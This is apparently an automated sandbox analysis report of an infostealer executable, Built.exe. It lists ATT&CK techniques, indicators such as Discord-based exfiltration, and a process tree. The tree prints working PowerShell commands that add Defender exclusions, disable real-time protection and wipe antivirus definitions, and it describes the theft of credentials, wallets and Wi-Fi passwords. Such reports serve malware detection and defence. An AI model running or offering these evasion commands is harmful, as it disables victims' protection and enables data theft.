cf691d4fccff15f697093ffc3b45d0e1c76725b701fb8f86ad39bcf444b770c6

Analysis

max time kernel
80s
max time network
82s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-10-2024 19:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

7.9MB
MD5

9500da3f633857c71861d6af33820c12
SHA1

8ecddcb17a72de8cc0a4f1bea277023cfe3f32ab
SHA256

cf691d4fccff15f697093ffc3b45d0e1c76725b701fb8f86ad39bcf444b770c6
SHA512

05fa9202d997648fadb4ad048e79c96c8b047e07dcd1881054428b2e9db35def361ce0b266582e63a9d303a4784f64d55c68067b00474737e112e3d3cb1c8324
SSDEEP

196608:bSHYKiwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jQ:MIHziK1piXLGVE4Ue0VJc

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4376	powershell.exe
4940	powershell.exe
1956	powershell.exe
4412	powershell.exe
5048	powershell.exe
1216	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4912	cmd.exe
2316	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
5112	bound.exe
5788	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2116	Built.exe
2116	Built.exe
2116	Built.exe
2116	Built.exe
2116	Built.exe
2116	Built.exe
2116	Built.exe
2116	Built.exe
2116	Built.exe
2116	Built.exe
2116	Built.exe
2116	Built.exe
2116	Built.exe
2116	Built.exe
2116	Built.exe
2116	Built.exe
2116	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
43	discord.com
48	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
38	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2232	tasklist.exe
2556	tasklist.exe
2944	tasklist.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023bca-22.dat	upx
behavioral2/memory/2116-26-0x00007FFFDAA70000-0x00007FFFDB0D3000-memory.dmp	upx
behavioral2/files/0x000a000000023b9d-28.dat	upx
behavioral2/files/0x000e000000023bc5-32.dat	upx
behavioral2/files/0x000e000000023bb1-50.dat	upx
behavioral2/files/0x000a000000023baa-49.dat	upx
behavioral2/files/0x000b000000023ba2-48.dat	upx
behavioral2/files/0x000b000000023ba1-47.dat	upx
behavioral2/files/0x000b000000023ba0-46.dat	upx
behavioral2/files/0x000a000000023b9f-45.dat	upx
behavioral2/files/0x000a000000023b9e-44.dat	upx
behavioral2/files/0x000a000000023b9c-43.dat	upx
behavioral2/files/0x0008000000023bfd-42.dat	upx
behavioral2/files/0x0008000000023bfc-41.dat	upx
behavioral2/files/0x0008000000023bcd-40.dat	upx
behavioral2/files/0x0008000000023bc7-37.dat	upx
behavioral2/files/0x0009000000023bc1-36.dat	upx
behavioral2/memory/2116-33-0x00007FFFEF260000-0x00007FFFEF26F000-memory.dmp	upx
behavioral2/memory/2116-31-0x00007FFFED7A0000-0x00007FFFED7C7000-memory.dmp	upx
behavioral2/memory/2116-56-0x00007FFFED730000-0x00007FFFED75B000-memory.dmp	upx
behavioral2/memory/2116-58-0x00007FFFEF160000-0x00007FFFEF179000-memory.dmp	upx
behavioral2/memory/2116-60-0x00007FFFE9B90000-0x00007FFFE9BB5000-memory.dmp	upx
behavioral2/memory/2116-62-0x00007FFFE9530000-0x00007FFFE96AF000-memory.dmp	upx
behavioral2/memory/2116-64-0x00007FFFE9C60000-0x00007FFFE9C79000-memory.dmp	upx
behavioral2/memory/2116-66-0x00007FFFEE3D0000-0x00007FFFEE3DD000-memory.dmp	upx
behavioral2/memory/2116-68-0x00007FFFE94F0000-0x00007FFFE9524000-memory.dmp	upx
behavioral2/memory/2116-71-0x00007FFFDAA70000-0x00007FFFDB0D3000-memory.dmp	upx
behavioral2/memory/2116-73-0x00007FFFE56A0000-0x00007FFFE576E000-memory.dmp	upx
behavioral2/memory/2116-75-0x00007FFFED7A0000-0x00007FFFED7C7000-memory.dmp	upx
behavioral2/memory/2116-74-0x00007FFFD9F60000-0x00007FFFDA493000-memory.dmp	upx
behavioral2/memory/2116-81-0x00007FFFEA190000-0x00007FFFEA19D000-memory.dmp	upx
behavioral2/memory/2116-80-0x00007FFFED730000-0x00007FFFED75B000-memory.dmp	upx
behavioral2/memory/2116-78-0x00007FFFE8E70000-0x00007FFFE8E84000-memory.dmp	upx
behavioral2/memory/2116-87-0x00007FFFD91F0000-0x00007FFFD92A3000-memory.dmp	upx
behavioral2/memory/2116-164-0x00007FFFE9B90000-0x00007FFFE9BB5000-memory.dmp	upx
behavioral2/memory/2116-221-0x00007FFFE9530000-0x00007FFFE96AF000-memory.dmp	upx
behavioral2/memory/2116-330-0x00007FFFE56A0000-0x00007FFFE576E000-memory.dmp	upx
behavioral2/memory/2116-329-0x00007FFFE94F0000-0x00007FFFE9524000-memory.dmp	upx
behavioral2/memory/2116-345-0x00007FFFD9F60000-0x00007FFFDA493000-memory.dmp	upx
behavioral2/memory/2116-417-0x00007FFFE9530000-0x00007FFFE96AF000-memory.dmp	upx
behavioral2/memory/2116-411-0x00007FFFDAA70000-0x00007FFFDB0D3000-memory.dmp	upx
behavioral2/memory/2116-572-0x00007FFFDAA70000-0x00007FFFDB0D3000-memory.dmp	upx
behavioral2/memory/2116-600-0x00007FFFD91F0000-0x00007FFFD92A3000-memory.dmp	upx
behavioral2/memory/2116-599-0x00007FFFEA190000-0x00007FFFEA19D000-memory.dmp	upx
behavioral2/memory/2116-598-0x00007FFFE8E70000-0x00007FFFE8E84000-memory.dmp	upx
behavioral2/memory/2116-597-0x00007FFFE56A0000-0x00007FFFE576E000-memory.dmp	upx
behavioral2/memory/2116-596-0x00007FFFE94F0000-0x00007FFFE9524000-memory.dmp	upx
behavioral2/memory/2116-595-0x00007FFFEE3D0000-0x00007FFFEE3DD000-memory.dmp	upx
behavioral2/memory/2116-594-0x00007FFFE9C60000-0x00007FFFE9C79000-memory.dmp	upx
behavioral2/memory/2116-593-0x00007FFFE9530000-0x00007FFFE96AF000-memory.dmp	upx
behavioral2/memory/2116-592-0x00007FFFE9B90000-0x00007FFFE9BB5000-memory.dmp	upx
behavioral2/memory/2116-591-0x00007FFFEF160000-0x00007FFFEF179000-memory.dmp	upx
behavioral2/memory/2116-590-0x00007FFFED730000-0x00007FFFED75B000-memory.dmp	upx
behavioral2/memory/2116-589-0x00007FFFEF260000-0x00007FFFEF26F000-memory.dmp	upx
behavioral2/memory/2116-588-0x00007FFFED7A0000-0x00007FFFED7C7000-memory.dmp	upx
behavioral2/memory/2116-587-0x00007FFFD9F60000-0x00007FFFDA493000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2900	cmd.exe
4444	netsh.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1768	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2376	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5048	powershell.exe
5048	powershell.exe
4376	powershell.exe
4376	powershell.exe
1216	powershell.exe
1216	powershell.exe
4412	powershell.exe
4412	powershell.exe
2316	powershell.exe
2316	powershell.exe
4412	powershell.exe
2316	powershell.exe
1860	powershell.exe
1860	powershell.exe
5048	powershell.exe
4376	powershell.exe
1216	powershell.exe
1860	powershell.exe
4940	powershell.exe
4940	powershell.exe
4940	powershell.exe
5468	powershell.exe
5468	powershell.exe
5468	powershell.exe
1956	powershell.exe
1956	powershell.exe
1956	powershell.exe
3620	msedge.exe
3620	msedge.exe
2232	msedge.exe
2232	msedge.exe
5208	powershell.exe
5208	powershell.exe
5208	powershell.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
5400	identity_helper.exe
5400	identity_helper.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2232	tasklist.exe
Token: SeDebugPrivilege	2556	tasklist.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeIncreaseQuotaPrivilege	4944	WMIC.exe
Token: SeSecurityPrivilege	4944	WMIC.exe
Token: SeTakeOwnershipPrivilege	4944	WMIC.exe
Token: SeLoadDriverPrivilege	4944	WMIC.exe
Token: SeSystemProfilePrivilege	4944	WMIC.exe
Token: SeSystemtimePrivilege	4944	WMIC.exe
Token: SeProfSingleProcessPrivilege	4944	WMIC.exe
Token: SeIncBasePriorityPrivilege	4944	WMIC.exe
Token: SeCreatePagefilePrivilege	4944	WMIC.exe
Token: SeBackupPrivilege	4944	WMIC.exe
Token: SeRestorePrivilege	4944	WMIC.exe
Token: SeShutdownPrivilege	4944	WMIC.exe
Token: SeDebugPrivilege	4944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4944	WMIC.exe
Token: SeRemoteShutdownPrivilege	4944	WMIC.exe
Token: SeUndockPrivilege	4944	WMIC.exe
Token: SeManageVolumePrivilege	4944	WMIC.exe
Token: 33	4944	WMIC.exe
Token: 34	4944	WMIC.exe
Token: 35	4944	WMIC.exe
Token: 36	4944	WMIC.exe
Token: SeDebugPrivilege	4376	powershell.exe
Token: SeDebugPrivilege	1216	powershell.exe
Token: SeDebugPrivilege	4412	powershell.exe
Token: SeDebugPrivilege	2944	tasklist.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeIncreaseQuotaPrivilege	4944	WMIC.exe
Token: SeSecurityPrivilege	4944	WMIC.exe
Token: SeTakeOwnershipPrivilege	4944	WMIC.exe
Token: SeLoadDriverPrivilege	4944	WMIC.exe
Token: SeSystemProfilePrivilege	4944	WMIC.exe
Token: SeSystemtimePrivilege	4944	WMIC.exe
Token: SeProfSingleProcessPrivilege	4944	WMIC.exe
Token: SeIncBasePriorityPrivilege	4944	WMIC.exe
Token: SeCreatePagefilePrivilege	4944	WMIC.exe
Token: SeBackupPrivilege	4944	WMIC.exe
Token: SeRestorePrivilege	4944	WMIC.exe
Token: SeShutdownPrivilege	4944	WMIC.exe
Token: SeDebugPrivilege	4944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4944	WMIC.exe
Token: SeRemoteShutdownPrivilege	4944	WMIC.exe
Token: SeUndockPrivilege	4944	WMIC.exe
Token: SeManageVolumePrivilege	4944	WMIC.exe
Token: 33	4944	WMIC.exe
Token: 34	4944	WMIC.exe
Token: 35	4944	WMIC.exe
Token: 36	4944	WMIC.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	4940	powershell.exe
Token: SeDebugPrivilege	5468	powershell.exe
Token: SeIncreaseQuotaPrivilege	6060	WMIC.exe
Token: SeSecurityPrivilege	6060	WMIC.exe
Token: SeTakeOwnershipPrivilege	6060	WMIC.exe
Token: SeLoadDriverPrivilege	6060	WMIC.exe
Token: SeSystemProfilePrivilege	6060	WMIC.exe
Token: SeSystemtimePrivilege	6060	WMIC.exe
Token: SeProfSingleProcessPrivilege	6060	WMIC.exe
Token: SeIncBasePriorityPrivilege	6060	WMIC.exe
Token: SeCreatePagefilePrivilege	6060	WMIC.exe
Token: SeBackupPrivilege	6060	WMIC.exe
Token: SeRestorePrivilege	6060	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2232	msedge.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe
2888	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4164 wrote to memory of 2116	4164	Built.exe	86
PID 4164 wrote to memory of 2116	4164	Built.exe	86
PID 2116 wrote to memory of 3616	2116	Built.exe	90
PID 2116 wrote to memory of 3616	2116	Built.exe	90
PID 2116 wrote to memory of 2044	2116	Built.exe	91
PID 2116 wrote to memory of 2044	2116	Built.exe	91
PID 2116 wrote to memory of 4424	2116	Built.exe	92
PID 2116 wrote to memory of 4424	2116	Built.exe	92
PID 2116 wrote to memory of 4380	2116	Built.exe	93
PID 2116 wrote to memory of 4380	2116	Built.exe	93
PID 2116 wrote to memory of 1612	2116	Built.exe	94
PID 2116 wrote to memory of 1612	2116	Built.exe	94
PID 2116 wrote to memory of 2888	2116	Built.exe	95
PID 2116 wrote to memory of 2888	2116	Built.exe	95
PID 2116 wrote to memory of 4316	2116	Built.exe	102
PID 2116 wrote to memory of 4316	2116	Built.exe	102
PID 2116 wrote to memory of 2552	2116	Built.exe	103
PID 2116 wrote to memory of 2552	2116	Built.exe	103
PID 4316 wrote to memory of 2232	4316	cmd.exe	106
PID 4316 wrote to memory of 2232	4316	cmd.exe	106
PID 2116 wrote to memory of 4692	2116	Built.exe	107
PID 2116 wrote to memory of 4692	2116	Built.exe	107
PID 2552 wrote to memory of 2556	2552	cmd.exe	108
PID 2552 wrote to memory of 2556	2552	cmd.exe	108
PID 2116 wrote to memory of 4912	2116	Built.exe	109
PID 2116 wrote to memory of 4912	2116	Built.exe	109
PID 2116 wrote to memory of 1880	2116	Built.exe	111
PID 2116 wrote to memory of 1880	2116	Built.exe	111
PID 2116 wrote to memory of 908	2116	Built.exe	113
PID 2116 wrote to memory of 908	2116	Built.exe	113
PID 2116 wrote to memory of 2900	2116	Built.exe	116
PID 2116 wrote to memory of 2900	2116	Built.exe	116
PID 2116 wrote to memory of 2308	2116	Built.exe	117
PID 2116 wrote to memory of 2308	2116	Built.exe	117
PID 2116 wrote to memory of 1200	2116	Built.exe	120
PID 2116 wrote to memory of 1200	2116	Built.exe	120
PID 3616 wrote to memory of 4412	3616	cmd.exe	121
PID 3616 wrote to memory of 4412	3616	cmd.exe	121
PID 2044 wrote to memory of 4376	2044	cmd.exe	123
PID 2044 wrote to memory of 4376	2044	cmd.exe	123
PID 4380 wrote to memory of 5112	4380	cmd.exe	124
PID 4380 wrote to memory of 5112	4380	cmd.exe	124
PID 4424 wrote to memory of 5048	4424	cmd.exe	125
PID 4424 wrote to memory of 5048	4424	cmd.exe	125
PID 1612 wrote to memory of 3004	1612	cmd.exe	126
PID 1612 wrote to memory of 3004	1612	cmd.exe	126
PID 2888 wrote to memory of 1216	2888	cmd.exe	128
PID 2888 wrote to memory of 1216	2888	cmd.exe	128
PID 4692 wrote to memory of 4944	4692	cmd.exe	129
PID 4692 wrote to memory of 4944	4692	cmd.exe	129
PID 4912 wrote to memory of 2316	4912	cmd.exe	130
PID 4912 wrote to memory of 2316	4912	cmd.exe	130
PID 1880 wrote to memory of 2944	1880	cmd.exe	131
PID 1880 wrote to memory of 2944	1880	cmd.exe	131
PID 2308 wrote to memory of 2376	2308	cmd.exe	132
PID 2308 wrote to memory of 2376	2308	cmd.exe	132
PID 908 wrote to memory of 3992	908	cmd.exe	133
PID 908 wrote to memory of 3992	908	cmd.exe	133
PID 2900 wrote to memory of 4444	2900	cmd.exe	134
PID 2900 wrote to memory of 4444	2900	cmd.exe	134
PID 1200 wrote to memory of 1860	1200	cmd.exe	135
PID 1200 wrote to memory of 1860	1200	cmd.exe	135
PID 2116 wrote to memory of 5344	2116	Built.exe	136
PID 2116 wrote to memory of 5344	2116	Built.exe	136

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4164
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3616
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4380
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      PID:5112
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.trksyln.net/tgmacro/download
        5⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2232
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xdc,0x104,0x7fffd85946f8,0x7fffd8594708,0x7fffd8594718
        6⤵
        
        PID:3340
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,4049274030429396873,5048336487106292670,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
        6⤵
        
        PID:3688
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,4049274030429396873,5048336487106292670,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3620
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,4049274030429396873,5048336487106292670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
        6⤵
        
        PID:4364
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4049274030429396873,5048336487106292670,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
        6⤵
        
        PID:5324
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4049274030429396873,5048336487106292670,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:1
        6⤵
        
        PID:5400
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4049274030429396873,5048336487106292670,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
        6⤵
        
        PID:5920
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,4049274030429396873,5048336487106292670,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:8
        6⤵
        
